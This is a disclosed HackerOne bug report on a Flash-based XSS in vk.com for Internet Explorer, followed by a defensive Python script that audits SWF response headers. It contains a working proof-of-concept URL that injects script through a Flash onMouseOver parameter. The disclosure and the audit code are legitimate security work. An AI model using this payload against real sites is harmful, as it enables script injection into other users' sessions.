VK.com: XSS at http://vk.com on IE using flash files

2015-06-05T09:56:45
ID H1:66121
Type hackerone
Reporter tunnelshade
Modified 2015-10-30T12:23:19

Description

Steps

  • Open the URL below in Internet Explorer

http://vk.com/swf/photo_uploader_lite.swf?h=h?&onMouseOver=document.write(window.location.hash.substr(1))#<script>alert(document.domain)</script>

  • Just hover your mouse over the page.

Minor Observations

  • No "X-Content-Type-Options: nosniff" header allows IE to play the Flash file directly, whereas other browsers present a download dialog, as the content type served is application/zip.
  • No X-Frame-Options header will allow this attack to be placed inside an iframe and run stealthily.
  • Other Flash files such as http://vk.com/swf/CaptureImg.swf will also be vulnerable in a similar fashion.
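A small defender-side check for the two header gaps listed in the observations above (missing `nosniff`, missing framing restriction) plus the `application/zip` content-type mismatch. This is an added example, not code from the report or from VK; the header dictionaries are constructed samples, not captured vk.com responses, and the `audit_url` helper name is my own.

```python
"""Audit the response headers of a hosted .swf for the weaknesses the report
lists: no X-Content-Type-Options: nosniff (IE sniffs a file served as
application/zip and plays it as Flash) and no framing restriction (the page
can be embedded in an iframe).  Constructed example, not the report's code."""

FLASH_TYPES = {"application/x-shockwave-flash"}


def audit_swf_headers(headers: dict) -> list:
    """Return a list of findings for a response that serves a .swf file."""
    # Header names are case-insensitive, so normalise them to lowercase.
    h = {k.lower(): v.strip() for k, v in headers.items()}
    findings = []
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if ctype not in FLASH_TYPES:
        findings.append(f"content-type is {ctype or 'missing'}, not a Flash type;"
                        " a sniffing browser may still execute it as Flash")
    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff (IE may sniff and play the file)")
    xfo = h.get("x-frame-options", "").upper()
    csp = h.get("content-security-policy", "").lower()
    if xfo not in ("DENY", "SAMEORIGIN") and "frame-ancestors" not in csp:
        findings.append("no framing restriction (X-Frame-Options or CSP frame-ancestors);"
                        " the file can be placed in an iframe")
    return findings


def audit_url(url: str) -> list:
    """Fetch the headers for url with a HEAD request and audit them (needs network)."""
    import urllib.request
    req = urllib.request.Request(url, method="HEAD")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return audit_swf_headers(dict(resp.headers.items()))


# Constructed sample: the weak response the report describes.
WEAK = {"Content-Type": "application/zip"}
# Constructed sample: a hardened response with both headers set.
HARDENED = {
    "Content-Type": "application/x-shockwave-flash",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "SAMEORIGIN",
}

if __name__ == "__main__":
    for name, hdrs in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit_swf_headers(hdrs) or ["ok"])
```

The headers only stop the sniffing and framing parts of the report; the `onMouseOver` parameter handling inside the SWF itself still needs fixing.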